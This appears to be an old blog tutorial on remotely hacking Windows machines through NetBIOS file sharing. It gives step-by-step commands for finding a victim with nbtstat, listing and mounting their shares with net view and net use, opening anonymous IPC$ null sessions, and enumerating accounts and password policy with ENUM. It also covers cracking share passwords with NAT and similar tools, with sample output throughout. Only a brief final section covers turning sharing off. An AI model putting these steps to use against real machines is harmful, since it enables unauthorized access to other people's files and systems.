Netbios stands for Network Basic Input Output System and is probably the easiest way to hack a system remotely. It was originally developed by IBM and Sytek as an Application Programming Interface (API) for client software to access LAN resources. Like any other service, works on a port (in this case on port 139).
NOTE: U can use any port scanner to find a system running netbios, by scanning for port 139. A specific scanner for netbios is "XSharez" which u can find it in our "scanners" download section.
We can manually interact with netbios, by using the command prompt and nbtstat comand. Just go to Start-> Run -> and type in "command" or "cmd" . Ur MS-DOS window 'll open. Now type in nbtstat/? and u 'll get somthing like:
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\>nbtstat/?
Displays protocol statistics and current TCP/IP connections using NBT
(NetBIOS over TCP/IP).
NBTSTAT [ [-a RemoteName] [-A IP address] [-c] [-n]
[-r] [-R] [-RR] [-s] [-S] [interval] ]
-a (adapter status) Lists the remote machine's name table given its name
-A (Adapter status) Lists the remote machine's name table given its
IP address.
-c (cache) Lists NBT's cache of remote [machine] names and their IP
addresses
-n (names) Lists local NetBIOS names.
-r (resolved) Lists names resolved by broadcast and via WINS
-R (Reload) Purges and reloads the remote cache name table
-S (Sessions) Lists sessions table with the destination IP addresses
-s (sessions) Lists sessions table converting destination IP
addresses to computer NETBIOS names.
-RR (ReleaseRefresh) Sends Name Release packets to WINS and then, starts Refresh
RemoteName Remote host machine name.
IP address Dotted decimal representation of the IP address.
interval Redisplays selected statistics, pausing interval seconds
between each display. Press Ctrl+C to stop redisplaying
statistics.
NOTE: The main command that we are going to use is c:\>nbtstat -a ip ex. c:\>nbtstat -a 100.100.100.100
After we use the above command, we 'll get a somthing like:
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------------
user <00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered
MAC Address = 00-02-48-18-29-E7
NOTE: The important think here (which actually tell us that the file and printer sharing is enabled on victim's system), is the <20>.
NOTE: If we dont get a <20>, then this means that file and printer sharing is not enabled on victims system and we must search for other victim.
Now we type in MS-DOS (which should be still opened) c:\>net view \\ip ex. c:\net view \\100.100.100.100
Share name Type Used as Comment
-------------------------------------------------------------------------
CDISK Disk
HP-6L Print
OK, now we can see that our victim is sharing a disk named as CDISK and printer sharing with name HP-6L.
NOTE: If we are able to share the victims hard disks or folders or printers we will be able to read write to the folders or hard disks or we may also be able to print anything on a remote printer.
Normal connection. Just type in MS-DOS c:\>net use k: \\100.100.100.100\CDISK
NOTE: Letter k can be anything u like. It 'll appear in ur "my computer" and u'll be able to control ur victim's system (like copy-paste-delete, read-write etc.)
If u get a confirmation as "Command was completed succesfully", then just go to "my computer" and open the k:\ driver (which 'll be ur victim's driver on ur PC) and do anything u like.
For null session, we must use c:\>net use \\100.100.100.100\IPC$ "" /u .
NOTE: If we get Command completed succesfully, then we are connected anonymously. If we got an error like ex. System error 51 occured or Host not found, then the victim has set on the RestrictAnonymous to avoid anonymous connections.
- CIS or ENUM
- NAT (Netbios Auditing Tool)
NOTE: Those tools are in our "Scanners" Download section. Go get them. We are going to use them to collect info from victim.
ENUM (works from command prompt):
usage: enum [switches] [hostname|ip]
-U get userlist
-M get machine list
-N get namelist dump (different from -U|-M)
-S get sharelist
-P get password policy information
-G get group and member list
-L get LSA policy information
-D dictionary crack, needs -u and -f
-d be detailed, applies to -U and -S
-c don't cancel sessions
-u specify username to use (default "")
-p specify password to use (default "")
-f specify dictfile to use (wants -D)
If we type (in ENUM command prompt) enum -U -S -G 100.100.100.100 , ENUM 'll try to connect to victim with a null session (doesnt matter if we already did) and we 'll get some info about victim. See below for example.
server: 100.100.100.100
setting up session... success.
getting user list (pass 1, index 0)... success, got 7.
Administrator Guest AM2o Cynos Sisqo printer
enumerating shares (pass 1)... got 6 shares, 0 left:
IPC$ print$ C ADMIN$ C$ CanonCLC320
Group: Administrators
AM2o\Administrator
Group: Backup Operators
Group: Guests
AM2o\Guest
Group: Power Users
AM2o\AM2o
AM2o\Cynos
AM2o\Sisqo
Group: *******
Group: Users
NT AUTHORITY\INTERACTIVE
NT AUTHORITY\Authenticated Users
AM2o\printer
Group: Debugger Users
NT AUTHORITY\SYSTEM
cleaning up... success.
NOTE: We can see from here the system name: AM2o, users: Administrator, Guest, Cynos, Sisqo, places sharing: IPC$ print$ C ADMIN$ C$ CanonCLC320, power users: AM2o, Cynos, Sisqo. You can use and the other commands to select more info if u like.
CIS (Cerberus Information Security):
Just set a host (without http://) or an ip (ex. 100.100.100.100), then go to "File" -> Select module and set "netbios checks". This 'll automatically select information. When completed, press view report. The advantage about CIS, is that when it finds a user, automatically try to find the password too (i'll explain later about passwords) if exists.
NOTE: The symbol $, indicates the hided places ex. $ADMIN is the %systemroot% (for windows NT and 2000 C:\winnt for XP C:\windows etc.). Those places are protected with passwords. So, try to avoid those places (for now). ex. if sharing places are IPC$ print$ C ADMIN$ C$ CanonCLC320, then use net use \\100.100.100.100\C .
NAT (Netbios Auditing Tool):
This is a very good tool which 'll try to find the sharing places and get through the passes. It uses userlist and passlist that we define, so collect as many info as u can with ENUM and/or CIS.
Usage: nat -o results.txt -u userlist.txt -p passlist.txt 100.100.100.100
NOTE: If password finally founded, we use net use k: \\ip\place * /u:user ex. net use k: \\100.100.100.100\C * /u:Cynos and when we asked for pass, just type it and u are connected. U 'll get "Command completed succesfully".
NOTE: Another one good tool like NAT, is PQwak2, which u can get it here.
- Click the Start Menu and choose Settings, Control Panel.
- Double-click the Network icon.
- Click the Configuration tab.
- Click the File and Print Sharing button. The File and Print Sharing dialog box will appear.
- Make sure that the following two boxes are NOT checked
"I want to be able to give others access to my files"
"I want to be able to allow others to print from my printers" - Click the OK button in the File and Print Sharing dialog box.
- Click the OK button in the Network control panel.
A prompt box will appear requesting you to restart your computer.
(If no changes were made, this box may not appear.) - Restart your computer for your new setting to take effect .
No comments:
Post a Comment